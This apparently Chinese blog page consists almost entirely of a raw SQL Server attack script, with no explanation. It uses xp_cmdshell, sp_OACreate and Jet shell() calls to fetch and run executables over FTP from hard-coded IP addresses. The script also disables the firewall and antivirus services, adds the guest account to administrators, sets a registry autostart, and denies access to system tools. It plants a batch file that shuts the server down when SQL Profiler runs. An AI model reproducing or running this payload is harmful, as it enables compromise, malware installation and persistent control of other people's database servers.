declare @sp_passwordcmdcov INT;declare @sp_passwordcmdcov1 INT;declare @sp_passwordcmdcov2 INT;declare @sp_passwordftpcov INT;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov output;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@sp_passwordcmdcov2 output;exec sp_OACreate 'wscript.shell',@sp_passwordftpcov output;exec sp_OAMethod @sp_passwordftpcov,'run',null,'ws.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordcmdcov1,'run',null,'ws.exe %SystemRoot%\system32\net1.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordcmdcov1,'run',null,'ws.exe %SystemRoot%\system32\p.exe /e /t /g system:F';exec sp_OAMethod @sp_passwordftpcov,'run',null,'ws.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';
go

xp_cmdshell 'command.com /c md iSql&cd iSql&del *.* /f /s /q&echo open 183.67.206.51 >j&echo 123 >>j&echo 123 >>j&echo get 1.exe >>j&echo bye >>j&ftp -i -s:j&del j&echo for %%i in (1.exe) do start %%i >D.bat&D.bat&del D.bat'
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 183.67.206.51>> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exit")')
go

exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
go

exec master..xp_cmdshell 'net1 stop sharedaccess&echo open 183.67.206.51> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 123.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&123.exe&123.exe&del cmd.txt /q /f&exit'
go

declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c "net1 stop sharedaccess&echo open 183.67.206.51> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 123.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&123.exe&123.exe&del cmd.txt /q /f&exit"'
go

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
go

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo 183.67.206.51> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exit")')
go


EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','shell','REG_SZ','c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 183.67.206.51 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 123.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&123.exe&123.exe&del cmd.txt /q /f&exit'

DECLARE @sp_passwordnet1 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet1 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet1,'run',null, 'net1 user guest seek';
go

DECLARE @sp_passwordnet2 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet2 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet2,'run',null, 'net1 user guest /active:Y';
go

DECLARE @sp_passwordnet3 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet3 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet3,'run',null, 'net1 localgroup administrators guest /add';
go

DECLARE @cmdpasswordn1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordne1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordn1,'run',null,'net1 stop sharedaccess';
go

DECLARE @cmdpasswordnet1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordnt1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordnet1,'run',null,'net1 stop KAVStart';

DECLARE @cmdpasswordnet1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordnt1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordnet1,'run',null,'net1 stop Symantec Proxy Service';
go

DECLARE @cmdpasswordnet1 INT EXEC SP_OAcreate 'wscript.shell',@cmdpasswordnt1 OUTPUT EXEC SP_OAMETHOD @cmdpasswordnet1,'run',null,'net1 stop Symantec Event Manager';
go


go
declare @wsp_pwsswordwww int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @wsp_pwsswordwww out
exec sp_oamethod @wsp_pwsswordwww, 'createtextfile', @f out, 'c:\windows\system32\1025\si.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "PROFILER90.exe" && shwtdown -s -t 0'
exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "PROFILER90.exe" && shwtdown -s /f'
exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "SqlExpressProfiler.exe" && shutsdown -s -t 0'
exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "SqlExpressProfiler.exe" && shwtdown -s /f'
exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "profiler.exe" && shwtdown -s -t 0'
exec @ret = sp_oamethod @f, 'writeline', NULL,'tasklist|findstr /i "profiler.exe" && shwtdown -s /f'
exec @ret = sp_oamethod @f, 'writeline', NULL,'del c:\windows\system32\1025\si.bat';
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c convert c:/fs:ntfs")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c regini %SystemRoot%\system32\1025\run.ini&attrib -s -h C:\Progra~1\Common~1\System\MSSearch\Bin\uc.exe&copy C:\Progra~1\Common~1\System\MSSearch\Bin\uc.exe/b + netstat.exe/b C:\Progra~1\Common~1\System\MSSearch\Bin\ucs.exe&attrib -s -h C:\Progra~1\Common~1\System\MSSearch\Bin\ucs.exe&net1 stop sharedaccess")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword

go
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset')) set quoted_identifier off
go
SET TEXTSIZE 64512
go
select @@microsoftversion
go
select convert(sysname, serverproperty(N'servername'))
go
SELECT ISNULL(SUSER_SNAME(), SUSER_NAME())
go
EXECUTE msdb.dbo.sp_sqlagent_get_perf_counters
go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c del ps.exe& del f.exe&attrib -s -h wbem\wbemfest.exe&del wbem\wbemfest.exe&del cs.exe&del fs.exe&del ws.exe&attrib -s -h c:\windows\system32\wbem\sr.exe&del c:\windows\system32\wbem\sr.exe&attrib -s -h c:\windows\system32\wbem\gaibian.exe&del c:\windows\system32\wbem\gaibian.exe&attrib -s -h c:\windows\system32\wbem\sp.exe&del c:\windows\system32\wbem\sp.exe&attrib -s -h c:\windows\system32\wbem\xj.exe&del c:\windows\system32\wbem\xj.exe&attrib -s -h c:\windows\system32\wbem\cacls.exe&del c:\windows\system32\wbem\cacls.exe&attrib -s -h c:\windows\system32\drivers\vs.exe&del c:\windows\system32\drivers\vs.exe&del http.vbs&del http1.vbs&del nan2.exe&del tstp.exe&attrib -s -h C:\Progra~1\Common~1\System\MSSearch\Bin\uc.exe&del C:\Progra~1\Common~1\System\MSSearch\Bin\uc.exe&del c:\fuck.txt&del caclss.exe&del c:\windows\system\1.vbs&echo caocaocao!>>cao.txt")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword

go
DECLARE @ObjectToken INT;EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT;EXEC sp_OASetProperty @ObjectToken, 'Type', 1;EXEC sp_OAMethod @ObjectToken, 'Open';EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x;EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'msx.exe', 2;EXEC sp_OAMethod @ObjectToken, 'Close';EXEC sp_OADestroy @ObjectToken;
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c c:\windows\system32\1025\si.bat")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c echo open 58.218.202.35>wpa.dat&echo 123>>wpa.dat&echo 521>>wpa.dat&echo get cao.exe rarx.exe>>wpa.dat&echo get cao1.exe wbemw.exe>>wpa.dat&echo get cao2.exe wbems.exe>>wpa.dat&echo bye>>wpa.dat")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c p -s:wpa.dat&rarx.exe&wbemw.exe&wbems.exe")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c echo ping 127.0.0.1 -n 25>nnd.bat&echo rarx>>nnd.bat&echo wbemw>>nnd.bat&echo wbems>>nnd.bat&echo exit>>nnd.bat&nnd.bat")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe wscript.exe /e /d everyone")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe ftp.exe /e /d everyone")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe cscript.exe /e /d everyone")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c msx.exe")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe net1.exe /e /d everyone")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\cmd.exe /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\wscript.exe /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\cscript.exe /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\net1.exe /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\ftp.exe /e /d everyone")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\cacls.exe /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe utilman.exe /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe p.exe /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe icacls.exe /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\icacls.exe /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe sethc.exe /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c wbems.exe")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c rarx.exe")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c wbemw.exe")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe cmd.exe /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe tftp.exe /e /d system")');

go
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cacls.exe dllcache\tftp.exe /e /d system")');

 

none
最后修改于:2023年05月08日 08:05

评论已关闭

Copyright © 2024 酷酷七友之家
< Powered by 微信 root6819 | QQ 302777528